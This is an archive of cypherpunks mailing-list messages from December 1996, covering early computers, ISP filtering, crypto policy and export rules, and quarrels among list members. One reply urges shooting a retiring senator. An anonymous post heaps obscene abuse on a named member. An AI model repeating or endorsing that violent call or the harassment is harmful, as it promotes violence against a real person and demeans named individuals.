> >
> >I would guess that those who became and remained successful technically
> >(as opposed to becoming "business people") were using HP computers and
> >such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
> >Radio Shack, etc. computers weren't reliable enough for serious work.
> 
> 
> My points were about the _children_ and what they were using when they grew up.
> 
> (In fact, note my use of the phrase "who grew up with Commodore PETs and
> Apple IIs...")
> 
> Indeed, in the 1970s I was using H-P 9825s and DEC PDP 11/34s, but the
> teenagers of that decade were, if they were fortunate and energetic, using
> PETs, Apple IIs, and the like.
> 
> --Tim May
> 
> 

DEC PDP 11's - spaghetti code extrordinaire! :-) 

I reall don't miss those old beasts, but they did provide the means to 
learn quite a bit about how a computer (of the day) really functions. 
It's too bad that kids today haven't been subjected to the experience - 
we might start seeing a better appreciation for coding, as well as some 
innovation outside of the "objectivfying" development that is bloating 
many a Wintel hard drive.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 6 Dec 1996 15:57:11 -0800 (PST)
To: asgaard@Cor.sos.sll.se
Subject: Re: Decline of Science ?? (Was: Stinger Specs)
Message-ID: <01ICP7V0UQ80AEL0DS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"asgaard@Cor.sos.sll.se"  "Asgaard"  6-DEC-1996 09:42:25.11

>and a PCR biochemist hacking DNA doesn't know shit about immunology
>or molecular neurology. In bio-science there is a discipline
>which tries to put all such kinds of specialties into a broader
>understanding of the human/animal body and soul - it's called
>physiology, and is a declining field with chronic lack of funds;
>not much money in it. I'm sure there is a comparable discipline

	While not a bio_chemist_, I am a molecular geneticist who
has heavily used PCR in the past - and am interested in learning
more about why particular "tweaks" work the way they do. I'm also
probably more familiar with immunology and with molecular
neurology (at least if you're meaning neuropsychopharmacology) than
most scientists outside those fields - certainly more so than most
people. There are still a few of us like that... and I'm Generation
3 in TCMay's terminology. BTW, I have taken physiology, and in its
human physiology manifestation it's actually a growing field in
the biomedical sciences area. Sure, a lot of people are
overspecializing up the wazoo... but those of us who don't are getting
more done.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Fri, 6 Dec 1996 19:03:42 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: Re: Exon Countdown Clock and farewell messages
In-Reply-To: <v02140b04aebfedff4261@[10.0.2.15]>
Message-ID: <Pine.SGI.3.91.961206190119.23036A-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain


okay, how bout this? just shoot the fucker in the head. Instead of trying 
to be coolin front of the rest of the c-punks by writing a letter, just go 
out and do what you gotta do. 

clint barnett
lord of the cosmos
emily carr institute

On Mon, 25 Nov 1996, Steve Schear wrote:

> This is a draft of my letter to our dear retiring senator.  Any suggested
> improvements?
> 
> -------------
> Honorable Senator Exon,
> 
> Although in all likelyhood you will never read this memorandum, I wish to
> express my sincere regret at your retirement and thanks for your many years
> of ignoble service to our nation misrepresenting the wishes of your
> constituents.
> 
> You have served as a stallwart against change as did those who resisted the
> telephone, automobile, radio, television and computer (to name but a few)
> before you.  You are a champion of politically correct thinking and
> behaviour, perhaps the most dangerous manifestation of an American trend to
> intolerence and obedience to social rules.
> 
> It is a shame we will not have your carcass to kick around in the halls of
> Congress come next term.  All the luck you're due.
> 
> -- Steve Schear
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArkanoiD <ark@paranoid.convey.ru>
Date: Fri, 6 Dec 1996 08:10:04 -0800 (PST)
To: bgrosman@healey.com.au (Benjamin Grosman)
Subject: Re: Encryption/data-changing in russia
In-Reply-To: <2.2.32.19961207002348.00874dcc@healey.com.au>
Message-ID: <199612061607.TAA17337@paranoid.convey.ru>
MIME-Version: 1.0
Content-Type: text/plain


nuqneH,
> 
> whilst on the subject of PGP in Russia, I encountered something very
> interesting. A friend of mine who is Russian, but lives out here, frequently
> corresponds with friends in Russia via email, and in the course of sending
> emai, they occasionally send an attachment. However, the attachment that
> _all_ his russian friends send, including the ones who use MIME capable
> email clients such as Eudora, always, _always_, uuencode files, and they say
> they can't do MIME. I am wondering if the encryption/data-changing laws in
> Russia are so strict as to disallow MIME encoding even, but still allows UU
> for some reason?
> 
> Any clues as to this?
> 

1) We do not care about computer laws. At all.
2) We just do not like mime UUENCODE is ok to send files,and we (at least i)
consider MIME almost useless and annoying - MIMEish sendmails often encode 
russian text (8th bit set) just because they think it's kosher. I don't think
so and there are still many people with MIME-unaware readers who get highly
annoyed when they see mime crap instead of plain text. BTW i've seen only one
REALLY mime-aware MUA,the Pine,others (incl elm) often work with national
codesets.. hmm.. i can' say incorrectly but when it forgets to decode header of 
message..

-- 
                                       _     _  _  _  _      _  _
   {::} {::} {::}  CU in Hell          _| o |_ | | _|| |   / _||_|   |_ |_ |_
   (##) (##) (##)        /Arkan#iD    |_  o  _||_| _||_| /   _|  | o |_||_||_|
   [||] [||] [||]            Do i believe in Bible? Hell,man,i've seen one!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 17:50:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Apology
In-Reply-To: <009AC6F5.DD0C50A0.3@SPRUCE.HSU.EDU>
Message-ID: <81iJyD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jc105558@spruce.hsu.edu writes:

> - James - wrote:
> >I am writing this
> ...
> >Tim May, do  
> >you have anything on subjest to discuss?
> 
> I apologies publicly for this comment.  I'm sorry Tim.  My bad.
> 
> - James -

Another "newbie" beaten into submission by the cybermob.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 6 Dec 1996 17:39:14 -0800 (PST)
To: nobody@zifi.genetics.utah.edu (Anonymous)
Subject: Re: Elliptic curves
In-Reply-To: <199612062345.QAA11915@zifi.genetics.utah.edu>
Message-ID: <199612070132.TAA15751@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


boring


igor

Anonymous wrote:
> 
> The arrival of warm weather is heralded by the 
> pig shit (or whatever kind of shit Intel swines 
> have for brains) getting soft in Timothy C[unt] 
> May's mini-cranium and the resulting green 
> slime seeping through key cocaine- and 
> syphilis- damaged nose and onto his keyboard.
> 
>     ^ ^
>    (o o) Timothy C[unt] May
>     ( )
>    \___/
>     !_!
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 19:54:14 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: The Science Generations
In-Reply-To: <199612061858.KAA22343@netcom7.netcom.com>
Message-ID: <32A8E900.6F37@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> At  1:12 AM 12/6/96 -0800, Dale Thorn wrote:
> >I would guess that those who became and remained successful technically
> >(as opposed to becoming "business people") were using HP computers and
> >such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
> >Radio Shack, etc. computers weren't reliable enough for serious work.

> I guess those people using VisiCalc on the Apple ][ weren't doing serious
> work :-).  (Also the many small businesses using these early machines for
> AR, Accounting etc.)  Me, I was doing OS programming on IBM 370s.

Let's talk about some real data processing.  dBase II on CP/M computers
(or certain proprietary hardware with adaptor cards), circa 1980-1982,
would be a good example.  If you had the right stuff, say, an HP-120 or
HP-125, or even an 80 series with the adaptor, and HP floppy drives, you
could process all day long for (years?) with scarcely a hitch.  You try
to put something like that on an Apple II with Apple floppies (using
whatever software was available), and you couldn't do the job.  The
machine and/or drives would quit in a few days, if not the first day,
and might even erase your diskettes in the process (a common occurrence
in those days).

In early 1985, just for fun, I had an HP-71 pocket computer hooked up to
a LaserJet printer and a couple of HP portable floppies, and printed my
store's databases on it.  Multiple indexes, thousands of records, each
index printed complete every day in separate copies for each salesman.
I wouldn't dream of trying that with an IBM or Apple floppy system.

Hard disks?  I *never* heard of an HP microcomputer hard disk crash in
those days, short of dropping the computer onto the floor while writing
a file.  We used to pull the wall plugs on our HP's while writing to a
file, with no bad effect.  Try that on an IBM or Apple circa <= 1985.

Computer hardware?  One thing I enjoyed doing for customers was pulling
a RAM card out of an HP-86 while it was running a program, then forcing
the card back into the slot.  Usually pulling the card had no effect,
then, putting it back in would generally reset the program.
Surge protectors?  Never sold one.  Not needed with HP's then.

An Apple II (like the other toy computers from 1975 to 1982) was a
hobbyist computer, which required frequent cleaning and scrubbing
internally to keep it running.  A pencil eraser was a common tool...

And let's not forget Apple and IBM attitudes: When I had HP's, if I ever
needed service, HP did it themselves, professionally (using static mats
etc.) and promptly.  You wouldn't find Apple or IBM offering to repair
their own microcomputers in those days (or ever).  For good reason!

Cost of service?  HP's contracts were usually 3% to 5% of the item cost
per year, compared to the "industry standard" of 15%.  Not a bad deal.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 6 Dec 1996 17:00:37 -0800 (PST)
To: Cypherpunks <kkirksey@appstate.campus.mci.net>
Subject: Re: "Family Channel" of the Internet?
In-Reply-To: <199612062239.RAA26100@aus-c.mp.campus.mci.net>
Message-ID: <Pine.LNX.3.95.961206195302.1431B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Dec 1996, Ken Kirksey wrote:

> 1) Is it technically possible for them to limit access to only approved 
> IP addresses?  If so, how can they do this, and is it possible to get 
> around these measures.

Packet filters can do this.  This could be thwarted by using a proxy
located on a trusted host.  There are more complicated ways (source routing,
IP spoofing, etc.) but these would require the cooperation of the target host.
Very improbable.

> 3) In general, how would you use crypto to ensure that your users only 
> connected to approved sites, regardless of the platform or browser 
> software they were using?

Crypto would probably only be used for authentication.  A simple password
system would work, but wouldn't be as secure, of course.  The ISP could
pass the packets through the appropriate filter rules depending on the user.
I don't know how much overhead would be associated with this technique, but
it seems to be the most secure way to do this.
 
> 
> I asked the guy to send me some technical details.  If I receive them, 
> I'll share unless he makes me sign an NDA.
> 
> Ken
> 

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMqjCVSzIPc7jvyFpAQE7egf+OMTzXyu/zzEg1+KE1v1/LgoyKXFc6QSr
7X5cqhyyX7kDzjUC+g/yklu9AQK1PRpM8SsYTP5uSSEWW/joBjMmUaVPdlnTctgD
Osa8rE2EPL1QkojK3thEaSn5OrxAzmEvTYnhJH53c2WIPFpsGm1Ipi9SHaMGQtgY
xFFR03gRSN1TeiULYzQHWXdovKFWFFNtYNgGTHd1et/TJvr67E30zRjOMIP0fD21
GN6fOPMsbbdtEwQsohrUkdsR+kMcOJDtYvBP/eJm4WCiie8SrEhCBSS7SKmkaWzX
zzc/UOIX3/LY9t5dt52fO4T8vNfoSsc4plc5wIsDkJbdbBwc9RlCsw==
=tFgY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 20:18:32 -0800 (PST)
To: "Butler, Scott" <SButler@chemson.com>
Subject: Re: Gilmore / Logos
In-Reply-To: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961206155349Z-920@csa-ntx.chemson.com>
Message-ID: <32A8EF3E.3249@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Butler, Scott wrote:
> Sorry for the spam,
> but does anyone know if it is true that John Gilmore and this Logos
> character are the same person ?
> Before you dismiss the idea, just think about it for a minute.

Seriously, it's very doubtful.  The Logos character is too lame to be
Gilmore.  Remember the Star Trek, Trouble With Tribbles, where the
Klingon says "...but Kirk, he's not soft.  He may be a swaggering,...",
and so on.  Whatever Gilmore is, I hope to God it's not Logos, or we're
in big trouble.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 20:22:33 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: denial of service and government rights
In-Reply-To: <3.0.32.19961206222425.00c4bbe0@panix.com>
Message-ID: <32A8F086.4286@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> At 04:02 PM 12/6/96 -0700, John Kozubik wrote:
> >you were speaking of human rights, and the issue of Bush being Knighted
> >... just out of curiousity, why is it against the constitution for Bush
> >to be Knighted??

> Article 1 Section 9 of the Constitution of the United States:
> No Title of Nobility shall be granted by the United States: And no Person
> holding any Office of Profit or Trust under them, shall, without the
> Consent of the Congress, accept of any present, Emolument, Office, or
> Title, of any kind whatever, from any King, Prince, or foreign State.

Re:  The consent of Congress clause.
Someone claimed already that Congress *did* approve of it, for Bush and
Schwartzkopf. Does anyone have factual info on this? An article perhaps?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 20:57:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Silence is not assent (re the Vulis nonsense)
In-Reply-To: <199612070421.WAA24511@mail.gte.net>
Message-ID: <32A8F8CA.1F7C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:

NOTE: original posting undeliverable due to spelling: cyhpherpunks

> From:   Dale Thorn
> If you could analogize the list to a human society, then you might
> understand that a pattern of decadence can set in here as it does in
> the more visible society, as is run from Washington DC, etc.  It is
> my hope to make a contribution here (as in the more visible society)
> to fight off some of that decadence, even when I get beat up on for it.

> There is a huge the difference between a society of people relating to
> each other based on principles of coercion vs an extemporaneous society
> of individuals who make their own decisions (daily) about when/where/how
> long they will associate with another.
> The society run by Washington,D.C. expects that people will have no
> choice but to fly in formation in the direction set by the leader who
> represents the majority (sort of).

That's a judgement, rather than an obvious truth.  Fact is, service in
Washington is purely voluntary, and one can leave anytime they wish.

> The virtual "society" of the cpunks is only based on their interest in
> opening up their mail and reading a few messages here & there according
> to their mood of the day or the moment.

Sounds pretty casual, doesn't it?  Maybe there are a *few* c-punks who
fit that description, but there are at least as many who are in this
thing for some heavy action, if you know what I mean, and I think you do.

> It is true that formal societies, like the one which was initially
> intended by The Founders (of the US), often run afoul of the original
> purpose for which it was begun.   They decay for many reasons.   This is
> precisely one of the elements in the background of the cpunks thinking
> ("the founders" and others) about societies and the "ties that bind"
> (supposedly) us to each other:  the interest in being released from that
> supposition that we are bound to each other and are obligated to
> maintain a relationship of some kind (as determined by the PC moral
> 'authorities').

[snip]

When I "joined" the Audio Engineering Society in the late 1970's, to get
their journal cheap, it was going pretty good.  Eventually it decayed
quite a bit, where they were running more pictures of their get-togethers
and awards programs than anything else.  I see cypherpunks in the same
straits potentially, as long as so many of the long-term "members" can
continue claiming that "It belongs to one person, really, our Cypherpunks
God", etc.  Don't get me wrong, there's a lot of potential here, and I
hope it continues, but....  BTW, thanks for a very civil reply.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Fri, 6 Dec 1996 18:08:04 -0800 (PST)
To: Ken Kirksey <cypherpunks@toad.com>
Subject: Re: "Family Channel" of the Internet?
Message-ID: <3.0.32.19961206210712.0091fda0@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:40 PM 12/6/96 -0500, Ken Kirksey wrote:
>1) Is it technically possible for them to limit access to only approved 
>IP addresses?  If so, how can they do this, and is it possible to get 
>around these measures.
Oh yeah, very easily.  Can you say 'proxy server'?  Corporations [including
the one I work for] have been using them for quite some time to control
Internet access.  For example, everytime I try to hit anything in the
GeoCities domain I get a nice little message saying I've been caught and to
stop being naughty.  You can get around it by using services (like
Anonymizer) beyond the proxy server that get pages, files, etc for you.
Assuming, of course, that the ISPs don't block those as well.

>2) What in the world would SET--I assume that was what he was talking 
>about--have to do with this?
Absolutely nothing.

>3) In general, how would you use crypto to ensure that your users only 
>connected to approved sites, regardless of the platform or browser 
>software they were using?
I wouldn't.  It's not even a crypto issue.  That's like asking how you
would use your tea kettle to peel this orange: sure, you *could* do it, but
why?

I think your pegged 'bogometer' had it pegged.

-Rick


Rick Osborne / osborne@gateway.grumman.com / Northrop Grumman Corporation
-------------------------------------------------------------------------
Double your drive space - delete Windows!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 6 Dec 1996 19:32:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: States' crypto legislation
Message-ID: <199612070316.VAA16489@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


hi

I wonder whether various states in the US have laws restricting use
of cryptography. In particular, does anyone know of such laws in
Oklahoma?

thank you

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 21:31:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Science Generations
In-Reply-To: <v03007800aecd4d8305f9@[207.167.93.63]>
Message-ID: <32A900DF.2521@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 1:12 AM -0800 12/6/96, Dale Thorn wrote:
> >Timothy C. May wrote:
> >> * Generation 3: The computer generation. The 1970s-80s, who grew up with
> >> Commodore PETs and Apple IIs (and some later machines). These are the "new
> >> pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

[snip my text]

> My points were about the _children_ and what they were using when they grew up.
> (In fact, note my use of the phrase "who grew up with Commodore PETs and
> Apple IIs...")
> Indeed, in the 1970s I was using H-P 9825s and DEC PDP 11/34s, but the
> teenagers of that decade were, if they were fortunate and energetic, using
> PETs, Apple IIs, and the like.

I hope you find this interesting (or amusing):

When I worked at Olympic Sales in El Segundo (2/81 thru 3/83), Saturday
was the big shopping day for electronics goodies, and the Hughes, Northrop
etc. guys would pile in with their kids and have a good time pestering
the OS salespeople.

I made a lot of observations and notes, and one of the truly fascinating
was how, when parents would bring the kids in, the kids would be faced
with Commodores, Ataris, TIs, Apples, and HPs, all on and running [but
the non-HPs would almost always be running some video software (games
usually) and the HPs would have a text screen up], and the kids would
most often make a beeline for the HP-87s and HP-85s.  Particularly the
younger kids, say, 8 to 12 years old.

The argument at the time (as I recall) was that the parents were right
to steer the kids over to the Apples and Ataris, since they didn't cost
an arm and a leg. It it had been my dad, though, he would have forgone
the Apple until he could get the HP, which is a big part of the reason
I'm able to do what I do today.  More power to dads like mine (in spite
of failings here and there)!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 21:00:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Systems with weak crypto, was: The House Rules At The Permanent Virtual
In-Reply-To: <199612062035.MAA03484@netcom7.netcom.com>
Message-ID: <42PJyD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> At  9:46 AM 12/6/96 -0500, Dr.Dimitri Vulis KOTM wrote:
> >If an entrepreneur wants to sell a new electrical gizmo and wants an
> >independent review of its safety, he pays $$$ for it. Apparently one of the
> >functions of the new brand of "cypher punks" is to provide a similar service
> >for free. Sorry, I'm not a part of it, and I'm not *that* interested in Don's
> >proposal. I have better use for my time.
>
> However, I assume that you have no objection to others reviewing Don't
> proposal for free (Actually for reputation).

Right now "snake oil" vendors treat the review process as an entitlement.

I think the world would be a slightly better place if punks of search of
reputation capital limited free reviews to freely available software; those
who *sell* something crypto-related deserve to be told, sternly: "Sorry,
union rules. You want a critique of your software, you pay for it."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 21:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Systems with weak crypto, was: The House Rules At The Permanent Virtual
In-Reply-To: <199612062035.MAA03484@netcom7.netcom.com>
Message-ID: <oBqJyD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> >I also don't think that the ease of breaking the code should be the only
> >consideration in evaluating a low-end cryptographic product. ...
> >
> >... If someone wants to market (and support) a crypto package for
> >the masses and gets the masses to deploy it, I take my hat off to them. It
> >doesn't matter if the code itself can be cracked as easily as the codes used
> >in PKZIP or MS Excel or MS Word (reportedly). If the users discover that the
> >code isn't strong enough for their needs, they'll upgrade to stronger codes.
> >The path from weak crypto to strong crypto is much shorter than the path fro
> >no crypto to some crypto.
> >
> >If the user interface and [did you mean "is" - bf] logical and transparent
> >and provides hooks to
> >replace the weak (non-export-controlled) crypto being shipped with a stronge
> >one (say, by FTPing a DLL) then it's a Good Thing.
>
> Good interfaces are definitely something needed for the widespread adoption
> of crypto, either strong or weak.  However, the general opinion I have
> heard is that UIs with easily replaced crypto are covered by ITAR.

I too have heard a lot of bullshit on this mailing list with no basis in
reality.

Suppose a vendor sells (or gives away) a software product, say, a front end
to POP3/SMTP, or a secure filesystem for WinNT, with hooks to crypto
routines in a DLL (or a shared library). The vendor bundles 2+ crypto
libraries with the product, publishes the API for plugging in 3rd party
libraries, and makes a diligent effort to limit key size to, say, 16 bits.

Later a strong library becomes available from overseas (perhaps a PGP
interface.) and it turns out that the key size limitation sort of doesn't
work (e.g. disallows keys from 17 to 127 keys but allows 128+). "Sorry,
officer, a bug in our program!"

Is USG going to risk a test case on the vendor?

Suppose an organization deploys (weak) crypto and establishes policies and
procedures for distributing keys, for ensuring that all that needs to be
encrypted is, for clearing plaintexts, etc. Suppose one day it becomes
dissatisfied with the weak crypto package and replaces it by a stronger one.

How much of the time and effort invested in deploying the weak package will
be directly transferrable?

> >Don is doing a Good Thing and the "cypher punks" are doing an evil thing.
>
> If Don is contributing to better interfaces, then I agree he is doing a
> good thing.  If all he is doing is proposing a new algorithm and describing
> it with, to be charitable, non-standard uses of well defined terms, then I
> disagree.

Don promotes the use of crypto. I have no idea what exactly he's selling.
I haven't been paid to review it. :-)

> I strongly disagree that cypherpunks are doing an evil thing by exposing
> the weaknesses in anyone's (including Don's) crypto system.  There are many
> ways to contribute, and publicizing the facts about a system are one of
> them.

"Cypher punks" are doing an evil thing not by exposing the alleged weaknesses
in Don't proposal (I have no idea if they're there or not, and I don't care).
"Cypher punks" such as Paul Bradley verbally abuse Don and turn this mailing
list into a laughing stock for the media. Putting "(spit)" after Don's name
and calling him "bullshit master" is not the same as exposing weaknesses in
his proposal.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Policy <crypto@uhf.wireless.net>
Date: Fri, 6 Dec 1996 19:05:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: ANSI X9 pointers
In-Reply-To: <199612070301.WAA01247@uhf.wdc.net>
Message-ID: <Pine.BSI.3.91.961206220409.1231G-100000@uhf.wdc.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi:

I am writing a paper on the ridiculous/backwards US crypto policy.

I am trying to write a few words about the ANSI X9 vs. clipper 
fight, but I haven't been able to find anything on ANSI X9. 

Can anyone point me to info on ANSI x9 on the web?

Bernie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Policy <crypto@uhf.wireless.net>
Date: Fri, 6 Dec 1996 19:12:24 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: DES/IDEA In Linux loopback devices...
In-Reply-To: <Pine.LNX.3.94.961203035114.3694A-100000@random.sp.org>
Message-ID: <Pine.BSI.3.91.961206221157.1231I-100000@uhf.wdc.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 3 Dec 1996, The Deviant wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Does anybody know where the archive for this kernel patch is?
> 

Please let me know too!. I didn't know such a thing existed.

Bernie crypto@uhf.wireless.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 6 Dec 1996 19:24:52 -0800 (PST)
To: John Kozubik <dthorn@gte.net>
Subject: Re: denial of service and government rights
Message-ID: <3.0.32.19961206222425.00c4bbe0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 12/6/96 -0700, John Kozubik wrote:
>you were speaking of human rights, and the issue of Bush being Knighted 
>... just out of curiousity, why is it against the constitution for Bush 
>to be Knighted??
>
>Thanks
>

Article 1 Section 9 of the Constitution of the United States:

No Title of Nobility shall be granted by the United States: And no Person
holding any Office of Profit or Trust under them, shall, without the
Consent of the Congress, accept of any present, Emolument, Office, or
Title, of any kind whatever, from any King, Prince, or foreign State.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 6 Dec 1996 22:25:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: CRYPTO KEYS STOLEN FROM A NAKED DRUGGED MAN
In-Reply-To: <v02140b00aece7a3a9c9e@[10.0.2.15]>
Message-ID: <v03007800aecebf1f1d00@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:40 PM -0800 12/6/96, Steve Schear wrote:
>I heard an almost identical story from a security guard at DEFCON IV last
>july in Las Vegas.  He said it happened in the hotel where he was working
>(not the Monte Carlo, which had just opened) in 1995.  The management
>managed to cover the event up and it never, according to him, appeared in
>the local papers.
>
>
>>| >>>  A friend of mine from UT passed this story onto me from the "Daily
>>| >>>  Texan" - the University of Texas newspaper. Apparently it occured
>>| >>>  during Fall Premier -- a UT tradition that is a celebration of the
>>| >>>  end of midterms.
...

This whole event actually happened to a friend of someone a friend of mine
knows, or at least he heard about from a friend, or maybe he read about it
one of Brunwand's (sp?) "urban legend" books ("Choking Doberman," and
several others.

The more things change....

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 6 Dec 1996 22:15:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199612070615.XAA16720@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vulis, the KOTM, Wrote:


>No one even commented on the latest Dr. Dobbs issue.

Maybe they were just too busy sifting through your irrelevant bullshit.

(And to continue the irrelevancies, so you can maybe see a bit of the irony of all this garbage you tend to keep sending despite pleas and flames, try checking your subject line if you are going to bitch about others' spelling. Adverbs need an "ly," and you should drop the "e.")








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Progressive Networks <talkingmail@prognet.com>
Date: Fri, 6 Dec 1996 23:31:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: RealAudio 3.0 ships! Download it now, for free.
Message-ID: <199612070731.XAA08682@correro2.prognet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear RealAudio User,

We are pleased to tell you that RealAudio Player
and Player Plus 3.0 have shipped!

You can download RealAudio 3.0 from our Web site at
http://www.realaudio.com.

RealAudio 3.0 supports broadcast-quality audio,
including stereo at 28.8 Kbps and near-CD quality
audio at ISDN. Platform support includes Microsoft
Windows 95 and 3.1, Macintosh PowerPC and 68040,
and many flavors of UNIX.

In addition, you can give friends and family the
gift of Internet audio with our full-featured
RealAudio Player Plus. Order online, and we'll ship
it in a special gift box to the person of your choice.

We hope you enjoy RealAudio 3.0.

Best wishes,

Rob Glaser
Chairman & CEO
Progressive Networks, Inc.

------------------------------------------------------
For more information on RealAudio e-mail updates,
visit http://www.realaudio.com/mailinglist/index.html.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 6 Dec 1996 21:10:20 -0800 (PST)
To: Crypto Policy <crypto@uhf.wireless.net>
Subject: Re: DES/IDEA In Linux loopback devices...
In-Reply-To: <Pine.BSI.3.91.961206221157.1231I-100000@uhf.wdc.net>
Message-ID: <Pine.LNX.3.95.961207001009.2287A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Dec 1996, Crypto Policy wrote:

> On Tue, 3 Dec 1996, The Deviant wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > 
> > Does anybody know where the archive for this kernel patch is?
> > 
> 
> Please let me know too!. I didn't know such a thing existed.

It's at csclub.uwaterloo.ca/pub/linux-stego .

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

